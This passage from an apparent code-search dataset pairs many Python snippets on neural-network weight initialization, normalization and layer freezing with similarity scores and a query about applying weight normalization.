zip(ms[:-1], ms[1:]):\n if isinstance(mod2, (nn.BatchNorm1d, nn.BatchNorm2d, nn.BatchNorm3d)):\n if mod1.bias is not None:\n continue\n\n if mod2.bias is not None:\n with torch.no_grad():\n mod1.bias = mod2.bias\n else:\n out_ch = len(mod2.running_mean)\n with torch.no_grad():\n mod1.bias = nn.Parameter(torch.zeros(out_ch))\n # remove bn\n for name, mod in ms:\n if isinstance(mod, (nn.BatchNorm1d, nn.BatchNorm2d, nn.BatchNorm3d)):\n delattr(m, name)", "def _initialize_weights(self):\r\n for m in self.modules():\r\n if isinstance(m, nn.Conv2d):\r\n m.weight.data.normal_(0, 0.05)\r\n if m.bias is not None:\r\n m.bias.data.zero_()", "def RemoveBatchNormLayers(network, batch_norm_names):\n i = 0\n j = 0\n while i < len(network.layer) and j < len(batch_norm_names): \n if network.layer[i].name == batch_norm_names[j]:\n del network.layer[i]\n j += 1\n else:\n i += 1\n \n if j != len(batch_norm_names):\n print j, len(batch_norm_names)\n raise AssertionError('All batch norm layers were not removed')", "def normalize_weights(self):\n total_weight = sum(self.weights)\n self.norm_weights = self.weights / float(total_weight)", "def remove_weight_norm_and_equal_lr(module: Module,\n name: str = 'weight') -> Module:\n return remove_weight_lambda(module, 'norm_equal_lr', name)", "def _init_weights(self):\n for m in self.modules():\n if type(m) in {\n nn.Linear,\n nn.Conv3d,\n nn.Conv2d,\n nn.ConvTranspose2d,\n nn.ConvTranspose3d\n }:\n nn.init.kaiming_normal_(\n m.weight.data, a=0, mode='fan_out', nonlinearity='relu',\n )\n if m.bias is not None:\n fan_in, fan_out = \\\n nn.init._calculate_fan_in_and_fan_out(m.weight.data)\n bound = 1 / math.sqrt(fan_out)\n nn.init.normal_(m.bias, -bound, bound)", "def _setWeights(self):\r\n for layer in self.layer_names:\r\n raw_w = getattr(self, f'{layer}_raw')\r\n self.module._parameters[layer] = F.dropout(raw_w, p=self.weight_pro, training=self.training)", "def normalizeWeights(self):\n for wt in self.weights:\n wt[wt>1] = 1\n wt[wt<-1] = -1\n for bs in self.bias:\n bs[bs>1] = 1\n bs[bs<-1] = -1", "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def reset_weights(self):\n self.head.reset_weights()", "def reset_all_weights(model: nn.Module) -> None:\n\n @torch.no_grad()\n def weight_reset(m: nn.Module):\n # - check if the current module has reset_parameters & if it's callabed called it on m\n reset_parameters = getattr(m, \"reset_parameters\", None)\n if callable(reset_parameters):\n m.reset_parameters()\n\n # Applies fn recursively to every submodule see: https://pytorch.org/docs/stable/generated/torch.nn.Module.html\n model.apply(fn=weight_reset)", "def associate_normalization_layers(self, model):\n if (len(self.leaf_modules) == 0):\n self.retrieve_leaf_modules(model) \n # Association list\n self.norm_modules = []\n self.prune_modules = []\n # Current weighted layer\n cur_weighted = None\n # Associate norm layers to their immediate previous weighted layers\n for name, m in self.leaf_modules:\n if (m.__class__ in [nn.Linear, nn.Conv1d, nn.Conv2d, nn.Conv3d, nn.ConvTranspose2d, nn.ConvTranspose3d]):\n cur_weighted = m\n if (m.__class__ in [nn.RNN, nn.GRU, nn.LSTM]):\n cur_weighted = m\n if ('Norm' in str(m.__class__)):\n if (cur_weighted is not None):\n self.norm_modules.append((m, cur_weighted))", "def reset(self):\n for layer in self.network:\n layer.clean()", "def remove_weight_scale(module: Module, name: str = 'weight') -> Module:\n return remove_weight_lambda(module, 'scale', name)", "def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):\n xavier_uniform_(m.weight)\n if m.bias is not None:\n zeros_(m.bias)", "def unfreeeze_all_layers(self):\n # Unfreeeze\n logger.info('MODEL: Unfreeze all layers.')\n for i in range(len(self.model.layers)):\n self.model.layers[i].trainable = True\n \n # Compile model\n logger.info('MODEL: Compiling...')\n self.model.compile(optimizer = Adam(lr=1e-4),\n loss={'yolo_loss': lambda y_true, y_pred: y_pred})", "def init_weights(self):\n # We don't use the `init_weights()` function in BaseModule, since it\n # doesn't support the initialization method from `reset_parameters()`\n # in Pytorch.\n if self.with_backbone:\n self.backbone.init_weights()\n\n if self.with_neck:\n for m in self.neck.modules():\n if isinstance(m, _ConvNd) or isinstance(m, _BatchNorm):\n m.reset_parameters()\n\n if self.with_head:\n for m in self.head.modules():\n if isinstance(m, _ConvNd) or isinstance(m, _BatchNorm):\n m.reset_parameters()", "def reset_model(model):\n\n\tfor layer in model.layers:\n\t\t# Note: these are custom depending on the layer type\n\t\tif '.MoleculeConv' in str(layer):\n\t\t\tW_inner = layer.init_inner((layer.inner_dim, layer.inner_dim))\n\t\t\tb_inner = np.zeros((1, layer.inner_dim))\n\t\t\t# Inner weights\n\t\t\tlayer.W_inner.set_value((T.tile(W_inner, (layer.depth + 1, 1, 1)).eval() + \\\n\t\t\t\tinitializations.uniform((layer.depth + 1, layer.inner_dim, layer.inner_dim)).eval()).astype(np.float32))\n\t\t\tlayer.b_inner.set_value((T.tile(b_inner, (layer.depth + 1, 1, 1)).eval() + \\\n\t\t\t\tinitializations.uniform((layer.depth + 1, 1, layer.inner_dim)).eval()).astype(np.float32))\n\n\t\t\t# Outer weights\n\t\t\tW_output = layer.init_output((layer.inner_dim, layer.units), scale = layer.scale_output)\n\t\t\tb_output = np.zeros((1, layer.units))\n\t\t\t# Initialize weights tensor\n\t\t\tlayer.W_output.set_value((T.tile(W_output, (layer.depth + 1, 1, 1)).eval()).astype(np.float32))\n\t\t\tlayer.b_output.set_value((T.tile(b_output, (layer.depth + 1, 1, 1)).eval()).astype(np.float32))\n\t\t\tlogging.info('graphFP layer reset')\n\n\t\telif '.Dense' in str(layer):\n\t\t\tlayer.W.set_value((layer.init(layer.W.shape.eval()).eval()).astype(np.float32))\n\t\t\tlayer.b.set_value(np.zeros(layer.b.shape.eval(), dtype=np.float32))\n\t\t\tlogging.info('dense layer reset')\n\n\t\telif '.Dropout' in str(layer):\n\t\t\tlogging.info('dropout unchanged')\n\t\telse:\n\t\t\traise ValueError('Unknown layer {}, cannot reset weights'.format(str(layer)))\n\tlogging.info('Reset model weights')\n\treturn model", "def _reset_weights(m):\n\n nn = import_optional_dependency(\"torch.nn\")\n init = import_optional_dependency(\"torch.nn.init\")\n if isinstance(m, nn.Conv1d):\n init.normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.Conv2d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.Conv3d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose1d):\n init.normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose2d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose3d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.BatchNorm1d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.BatchNorm2d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.BatchNorm3d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.Linear):\n init.xavier_normal_(m.weight.data)\n init.normal_(m.bias.data)\n elif isinstance(m, nn.LSTM):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.LSTMCell):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.GRU):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.GRUCell):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)", "def remove_tracking(model, norm_type, norm_power=0.2):\n normlayer = select_norm(norm_type, norm_power=norm_power)\n # find total number of childern\n model_len = 0\n for n, child in enumerate(model.children()):\n model_len = n\n\n # for layer 0 which is outside\n conv_shape = model.conv1.out_channels\n w = model.bn1.weight\n b = model.bn1.bias\n model.bn1 = normlayer(conv_shape)\n model.bn1.weight = w\n model.bn1.bias = b\n\n # replace in all other layers\n for n, child in enumerate(model.children()):\n if 4 <= n <= model_len - 2:\n for i in range(len(child)):\n conv_shape = child[i].conv1.out_channels\n w = child[i].bn1.weight\n b = child[i].bn1.bias\n child[i].bn1 = normlayer(conv_shape)\n child[i].bn1.weight = w\n child[i].bn1.bias = b\n\n conv_shape = child[i].conv2.out_channels\n w = child[i].bn2.weight\n b = child[i].bn2.bias\n child[i].bn2 = normlayer(conv_shape)\n child[i].bn2.weight = w\n child[i].bn2.bias = b\n # if model have bn3 as well\n try:\n conv_shape = child[i].conv3.out_channels\n w = child[i].bn3.weight\n b = child[i].bn3.bias\n child[i].bn3 = normlayer(conv_shape)\n child[i].bn3.weight = w\n child[i].bn3.bias = b\n except:\n pass\n try:\n conv_shape = child[i].downsample[0].out_channels\n w = child[i].downsample[1].weight\n b = child[i].downsample[1].bias\n child[i].downsample[1] = normlayer(conv_shape)\n child[i].downsample[1].weight = w\n child[i].downsample[1].bias = b\n print(\"downsample\")\n except:\n print(\"no downsample\")\n\n return model", "def remove_spectral_norm(module, name='weight'):\n for k, hook in module._forward_pre_hooks.items():\n if isinstance(hook, SpectralNorm) and hook.name == name:\n hook.remove(module)\n del module._forward_pre_hooks[k]\n return module\n\n raise ValueError(\"spectral_norm of '{}' not found in {}\".format(\n name, module))", "def reset_weights(self):\r\n self._weights = deepcopy(self._tmp_weights)\r\n self._tmp_weights = None", "def normalize_weights(self):\n \n # Set negative weights to zero\n # Normalize to sum to one.\n \n\n\n self.new_weight=[]\n for i in self._weights:\n if any(i < 0 for i in self._weights):\n self.new_weight = [0,1]\n\n elif all(i == 0 for i in self._weights):\n i = 1/len(self._weights)\n self.new_weight.append(i)\n else:\n i = i/sum(self._weights)\n self.new_weight.append(i)\n\n # If the weights are all zeros, set weights equal to 1/k, where k is the number\n # of components.\n self._weights = self.new_weight\n self._weights = np.round(self._weights,3)", "def freeze_model(self):\n # BN layers need to be freezed explicitly since they cannot be freezed via '.requires_grad=False'\n for module in self.modules():\n if isinstance(module, (nn.BatchNorm2d, nn.GroupNorm)):\n module.eval()\n \n # freeze all parameters\n for param in self.parameters():\n param.requires_grad = False", "def update_weights(self):\n\n self.weights -= self.loss_grads\n self.loss_grads = np.zeros(self.weights.shape)", "def reset(self):\n self._weights.clear()", "def init_weights(self, module):\n if isinstance(module, (torch.nn.Linear, torch.nn.Embedding, torch.nn.LayerNorm)):\n module.weight.data.normal_(mean=0.0, std=self.initializer_range)\n if isinstance(module, (torch.nn.Linear, torch.nn.LayerNorm)) and module.bias is not None:\n module.bias.data.zero_()", "def reset_parameters(self) -> None:\n for name, param in self.named_parameters():\n if not (name == 'word_embedding.weight' and self.use_pretrained_embeddings):\n nn.init.normal(param, std=0.1)", "def _rescale_module(module):\n for sub in module.modules():\n if isinstance(sub, (nn.Conv1d, nn.ConvTranspose1d, nn.Conv2d, nn.ConvTranspose2d)):\n std = sub.weight.std().detach()\n scale = (std / 0.1) ** 0.5\n sub.weight.data /= scale\n if sub.bias is not None:\n sub.bias.data /= scale", "def _set_freeze_layers(self):\n for layer in self.encoder.layers[:self.freeze_layers]:\n layer.trainable = False", "def reset_parameters(self):\n model_utils.truncated_normal_(self.weight, mean=0.0, std=0.1)\n model_utils.truncated_normal_(self.bias, mean=0.0, std=0.1)", "def apply_weight_norm(self):\n\n def _apply_weight_norm(m):\n if isinstance(m, torch.nn.Conv1d) or isinstance(\n m, torch.nn.ConvTranspose1d\n ):\n torch.nn.utils.weight_norm(m)\n logging.debug(f\"Weight norm is applied to {m}.\")\n\n self.apply(_apply_weight_norm)", "def apply_weight_norm(self):\n\n def _apply_weight_norm(m):\n if isinstance(m, torch.nn.Conv1d) or isinstance(\n m, torch.nn.ConvTranspose1d\n ):\n torch.nn.utils.weight_norm(m)\n logging.debug(f\"Weight norm is applied to {m}.\")\n\n self.apply(_apply_weight_norm)", "def apply_weight_norm(self):\n\n def _apply_weight_norm(m):\n if isinstance(m, torch.nn.Conv1d) or isinstance(\n m, torch.nn.ConvTranspose1d\n ):\n torch.nn.utils.weight_norm(m)\n logging.debug(f\"Weight norm is applied to {m}.\")\n\n self.apply(_apply_weight_norm)", "def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n xavier_init(m)", "def set_to_zero_model_weights(model):\n\n for layer_weigths in model.parameters():\n layer_weigths.data.sub_(layer_weigths.data)", "def clear(self):\n for i in range(0, len(self.weights)):\n self.weights[i] = 0", "def init_weights(layer):\r\n layer_name = layer.__class__.__name__\r\n if layer_name.find(\"Conv\") != -1:\r\n layer.weight.data.normal_(0.0, 0.02)\r\n elif layer_name.find(\"BatchNorm\") != -1:\r\n layer.weight.data.normal_(1.0, 0.02)\r\n layer.bias.data.fill_(0)", "def init_weights(layer):\n layer_name = layer.__class__.__name__\n if layer_name.find(\"Conv\") != -1 and hasattr(layer, 'weight'):\n layer.weight.data.normal_(0.0, 0.02)\n elif layer_name.find(\"BatchNorm\") != -1 and hasattr(layer, 'weight'):\n layer.weight.data.normal_(1.0, 0.02)\n layer.bias.data.fill_(0)", "def normalize_weights(self, w):\n n = w.astype(np.float64, copy=True)\n c = float(np.sum(w))\n n /= c\n return n", "def initialize_weights(self):\n for layer in self._cnn_layers:\n weights_initializer.WeightsInitializer.initialize_layer_or_model(layer)", "def _compute_weights(self):\n with variable_scope.variable_scope('compute_weights'):\n self.layer.W = nn_impl.l2_normalize(\n self.layer.v, axis=self.norm_axes) * self.layer.g", "def _compute_weights(self):\n with variable_scope.variable_scope('compute_weights'):\n self.layer.W = nn_impl.l2_normalize(\n self.layer.v, axis=self.norm_axes) * self.layer.g", "def normalize_weight(self, Z):\n self.weight /= Z", "def init_weights(self):\n with torch.no_grad():\n self._init_weights()", "def reset(self):\n ih = (param for name, param in self.named_parameters() if 'weight_ih' in name)\n hh = (param for name, param in self.named_parameters() if 'weight_hh' in name)\n b = (param for name, param in self.named_parameters() if 'bias' in name)\n for t in ih:\n torch.nn.init.xavier_uniform_(t)\n for t in hh:\n torch.nn.init.orthogonal_(t)\n for t in b:\n torch.nn.init.constant_(t, 0)", "def init_weights(self, clz):\n for ch in self.children():\n if issubclass(ch.__class__, nn.Module) and not issubclass(ch.__class__, PreTrainedModel):\n ch.apply(lambda module: clz._init_weights(self.lrm, module))", "def clear_layers_name():\n set_keep['_layers_name_list'] =[]", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=self.norm_type, dim=1)", "def reset_nn(self): # Clear current network\n self.weights = np.zeros((p.num_rovers, self.n_weights))\n self.in_layer = np.zeros((p.num_rovers, self.n_inputs))\n self.hid_layer = np.zeros((p.num_rovers, self.n_nodes))\n self.out_layer = np.zeros((p.num_rovers, self.n_outputs))", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def unfreeze_layers(model: torch.nn.Module) -> None:\n for param in model.parameters():\n param.requires_grad = True", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=2, dim=1)\n self.relation_embeddings.weight.data = normalize(self.relation_embeddings.weight.data,\n p=2, dim=1)\n self.projection_matrices.data = normalize(self.projection_matrices.data, p=2, dim=2)", "def _weight_initializer(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1.0)\n nn.init.constant_(m.bias, 0.0)", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=2, dim=1)\n self.relation_embeddings.weight.data = normalize(self.relation_embeddings.weight.data,\n p=2, dim=1)\n self.ent_proj_vects.data = normalize(self.ent_proj_vects.data, p=2, dim=1)\n self.rel_proj_vects.data = normalize(self.rel_proj_vects.data, p=2, dim=1)", "def reset_weights(self):\n np.random.seed(self.seed)\n self.node_embedding = xavier_normal(size=(self.vocab_size, self.layer1_size), as_type=np.float32)\n self.context_embedding = xavier_normal(size=(self.vocab_size, self.layer1_size), as_type=np.float32)\n\n\n self.centroid = np.zeros((self.k, self.layer1_size), dtype=np.float32)\n self.covariance_mat = np.zeros((self.k, self.layer1_size, self.layer1_size), dtype=np.float32)\n self.inv_covariance_mat = np.zeros((self.k, self.layer1_size, self.layer1_size), dtype=np.float32)\n self.pi = np.zeros((self.vocab_size, self.k), dtype=np.float32)", "def remove_weights(self):\n cdef StdVectorFst result = StdVectorFst(isyms=self.isyms, osyms=self.osyms)\n openfst.ArcMap(self.fst[0], result.fst, openfst.RmTropicalWeightMapper())\n return result", "def turn_intensity_normalization_off(self):\n self.intensity_normalize_image = False", "def module_cleanup():\n from bokeh.core.has_props import _default_resolver\n to_reset = list(panel_extension._imports.values())\n\n _default_resolver._known_models = {\n name: model for name, model in _default_resolver._known_models.items()\n if not any(model.__module__.startswith(tr) for tr in to_reset)\n }", "def reset(self):\n weight = self.module.weight.data\n self.sensitivity_in = torch.zeros(weight.shape[1]).to(weight.device)\n self._features = torch.Tensor()\n self._current_batch = 1", "def _weight_initializer(self):\n for m in self.modules():\n if isinstance(m, nn.ConvTranspose2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1.0)\n nn.init.constant_(m.bias, 0.0)", "def reset_pooling_layer(self):\n self._semantic_decoder.reset_pooling_layer()\n if self._instance_decoder is not None:\n self._instance_decoder.reset_pooling_layer()", "def reset_pooling_layer(self):\n self._aspp.reset_pooling_layer()", "def extract_weights(self, name):\n\n # Extract weights\n weight_layer = (self.merged_model).get_layer(name)\n weights = weight_layer.get_weights()[0]\n\n # Normalize\n # weights = weights / np.linalg.norm(weights, axis = 1).reshape((-1, 1))\n return weights", "def reset_parameters(self):\n if self.W is not None:\n tanh_gain = weight_init.calculate_gain(\"tanh\")\n weight_init.xavier_normal_(self.W, tanh_gain)\n # self.W.data.uniform_(-0.001, 0.001)", "def modify_weights_after_load(model):\n # Prune heads if needed\n if model.config.pruned_heads:\n model.prune_heads(model.config.pruned_heads)\n\n # Tie weights if needed\n model.tie_weights()", "def init_weights(model, fc_init_std=0.01):\n for m in model.modules():\n if isinstance(m, nn.Conv3d):\n \"\"\"\n Follow the initialization method proposed in:\n {He, Kaiming, et al.\n \"Delving deep into rectifiers: Surpassing human-level\n performance on imagenet classification.\"\n arXiv preprint arXiv:1502.01852 (2015)}\n \"\"\"\n c2_msra_fill(m, nonlinearity=('relu', 'leaky_relu')[0])\n # c2_xavier_fill(m)\n # nn.init.xavier_normal_(m.weight)\n # nn.init.xavier_uniform_(m.weight)\n # if m.bias is not None: # pyre-ignore\n # nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm3d) or isinstance(m, nn.InstanceNorm3d):\n m.weight.data.fill_(1.0)\n m.bias.data.zero_()\n if isinstance(m, nn.Linear): # This assumes nn.Linear is the final layers\n # TODO check to see if this is effective in this architecture since the final is a conv3d\n m.weight.data.normal_(mean=0.0, std=fc_init_std)\n m.bias.data.zero_()", "def _init_weights(self):\n nn.init.xavier_normal_(self.out.weight)", "def normalize_weights(w, dims=(0,), bias=1e-5):\n with tf.name_scope('normalization'):\n return w / (tf.sqrt(tf.reduce_sum(tf.square(w), dims, keep_dims=True) + bias))", "def init_weights(net):\n for m in net.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n nn.init.xavier_uniform_(m.weight)\n # nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n return net", "def normalize(self, weights):\n tot = sum(weights)\n newW = [-1] * self.numParticles\n for i in range(len(weights)):\n newW[i] = weights[i] / tot\n return newW", "def train(self, mode=True, freeze_bn=False):\n super(WideResNet, self).train(mode)\n self.freeze_bn = freeze_bn\n if self.freeze_bn:\n print(\"Freezing Mean/Var of BatchNorm2D.\")\n print(\"Freezing Weight/Bias of BatchNorm2D.\")\n if self.freeze_bn:\n for m in self.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n m.weight.requires_grad = False\n m.bias.requires_grad = False", "def set_weights_without_biases(self, weights, layer_number):\r\n self.weights[layer_number] = weights", "def _cleanup(self):\n\n self.netIns = []\n self.netOuts = []\n self.Gradients = [None]*self.size", "def _init_weights(layer):\n if isinstance(layer, (nn.Conv2d, nn.Linear)):\n torch.nn.init.xavier_uniform_(layer.weight)\n try:\n # Some layers may not have biases, so catch the exception and pass.\n layer.bias.data.fill_(0.0)\n except AttributeError:\n pass", "def reset(self):\n\n def reset_function(module):\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n m.reset_parameters()\n\n self.apply(reset_function)", "def init_weights(self):\n\n for ch in self.children():\n if issubclass(ch.__class__, torch.nn.Module) and not issubclass(ch.__class__, PreTrainedModel):\n ch.apply(lambda module: self.transformer.__class__._init_weights(self.transformer, module))", "def reset_parameters(self) -> None:\n std = math.sqrt(3 / self.in_features)\n self.weight.data.uniform_(-std, std)\n self.bias.data.uniform_(-std, std)", "def applyMorphologicalCleaning(self, image):", "def test_permute_W_no_model(self):\n\t\tN, M = 4096, 4096\n\t\titerator = self.watcher.make_layer_iterator(model=self.model, layers=[self.fc2_layer])\n\t\tfor ww_layer in iterator:\n\t\t\tself.assertEqual(ww_layer.layer_id,self.fc2_layer)\n\t\t\tW = ww_layer.Wmats[0]\n\t\t\tself.assertEqual(W.shape,(N,M))\n\t\t\t\n\t\t\tself.watcher.apply_permute_W(ww_layer)\n\t\t\tW2 = ww_layer.Wmats[0]\n\t\t\tself.assertNotEqual(W[0,0],W2[0,0])\n\t\t\t\n\t\t\tself.watcher.apply_unpermute_W(ww_layer)\n\t\t\tW2 = ww_layer.Wmats[0]\n\t\t\tself.assertEqual(W2.shape,(N,M))\n\t\t\tself.assertEqual(W[0,0],W2[0,0])", "def reset_layer(self):\n if self.W is None:\n if self.sparse_initialize:\n W_values = self.sparse_initialize_weights()\n else:\n if self.activation == theano.tensor.tanh:\n born = np.sqrt(6. / (self.n_in + self.n_out))\n else:\n born = 4 * np.sqrt(6. / (self.n_in + self.n_out))\n W_values = np.asarray(self.rng.uniform(\n low=-born,\n high=born,\n size=(self.n_in, self.n_out)),\n dtype=theano.config.floatX)\n\n self.W = theano.shared(value=W_values, name='W', borrow=True)\n\n if self.b is None:\n b_values = np.zeros(int(self.n_out/self.num_pieces),\n dtype=theano.config.floatX)\n self.b = theano.shared(value=b_values, name='b', borrow=True)\n\n if self.sparser is None:\n s_values = np.ones(\n int(self.n_out/self.num_pieces), dtype=theano.config.floatX)\n self.sparser = theano.shared(value=s_values, name='sparser',\n borrow=True)\n # The layer parameters\n self.params = [self.W, self.b]", "def RemoveWeights(frame, zero_nans=False):\n if \"Wpol\" not in frame and \"Wunpol\" not in frame:\n return\n\n if not frame[\"T\"].weighted:\n return frame\n ValidateMaps(frame)\n\n tmap = frame.pop(\"T\")\n\n if \"Wpol\" in frame:\n wmap = frame[\"Wpol\"]\n qmap = frame.pop(\"Q\")\n umap = frame.pop(\"U\")\n maps.remove_weights(tmap, qmap, umap, wmap, zero_nans=zero_nans)\n else:\n wmap = frame[\"Wunpol\"]\n maps.remove_weights_t(tmap, wmap, zero_nans=zero_nans)\n\n frame[\"T\"] = tmap\n if \"Wpol\" in frame:\n frame[\"Q\"] = qmap\n frame[\"U\"] = umap\n\n return frame", "def reset_parameters(self):\n\n for layer in self.layers:\n layer.reset_parameters()", "def _untrain(self):\n if not self.trained:\n return\n for clf in self.clfs:\n clf.untrain()\n super(BoostedClassifier, self)._untrain()", "def init_weights(module, negative_slope=0):\n if isinstance(module, (nn.Conv2d, nn.ConvTranspose2d)):\n nn.init.kaiming_normal_(module.weight.data, negative_slope)\n module.bias.data.zero_()", "def remove_blurring(self):\n self._render_passes.remove_blur_pass()", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=self.norm_type, dim=1)\n self.normal_vectors.data = normalize(self.normal_vectors, p=2, dim=1)", "def initialize_weights(self):\n weights_initializer.WeightsInitializer.initialize_layer_or_model(\n self._batch)", "def reset_layers(self, rov_id): # Clear hidden layers and output layers\n for i in range(self.n_nodes):\n self.hid_layer[rov_id, i] = 0.0\n\n for j in range(self.n_outputs):\n self.out_layer[rov_id, j] = 0.0", "def weight_norm(module, name=\"weight\", dim=0):\n WeightNorm.apply(module, name, dim)\n return module" ]
[ "0.79998016", "0.76628864", "0.7629923", "0.72848314", "0.7045166", "0.67848754", "0.6780856", "0.6746634", "0.6591088", "0.65823525", "0.6566755", "0.65617", "0.65572643", "0.65561306", "0.6538293", "0.6538293", "0.6538293", "0.6529808", "0.6526071", "0.651576", "0.64801204", "0.6455137", "0.64305204", "0.642898", "0.6405197", "0.6397573", "0.63855386", "0.6293032", "0.6251394", "0.6249921", "0.6233528", "0.6218253", "0.62125546", "0.6161037", "0.6131475", "0.61087567", "0.60970056", "0.6089598", "0.60496736", "0.60437787", "0.60437787", "0.60437787", "0.6040404", "0.60095733", "0.59844965", "0.5978158", "0.597737", "0.5969688", "0.5968303", "0.5965113", "0.5965113", "0.5962245", "0.59447", "0.5936001", "0.5907403", "0.59055173", "0.5901809", "0.5892338", "0.58894366", "0.58894366", "0.5871337", "0.5862168", "0.58555585", "0.5836302", "0.58316904", "0.5826069", "0.5822462", "0.5818256", "0.5817126", "0.5813045", "0.5796031", "0.5795884", "0.57813996", "0.57679164", "0.57545006", "0.57498974", "0.5747443", "0.57424116", "0.57346195", "0.5728497", "0.57271147", "0.5710471", "0.5693999", "0.5684778", "0.56757396", "0.5671626", "0.5663894", "0.5649495", "0.5648036", "0.56285703", "0.5622598", "0.5621248", "0.5614808", "0.5613118", "0.5610067", "0.55977714", "0.5596888", "0.55955064", "0.5567413" ]
0.7893102
1
Apply weight normalization module from all of the layers.
def apply_weight_norm(self): def _apply_weight_norm(m): if isinstance(m, torch.nn.Conv1d) or isinstance( m, torch.nn.ConvTranspose1d ): torch.nn.utils.weight_norm(m) logging.debug(f"Weight norm is applied to {m}.") self.apply(_apply_weight_norm)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def associate_normalization_layers(self, model):\n if (len(self.leaf_modules) == 0):\n self.retrieve_leaf_modules(model) \n # Association list\n self.norm_modules = []\n self.prune_modules = []\n # Current weighted layer\n cur_weighted = None\n # Associate norm layers to their immediate previous weighted layers\n for name, m in 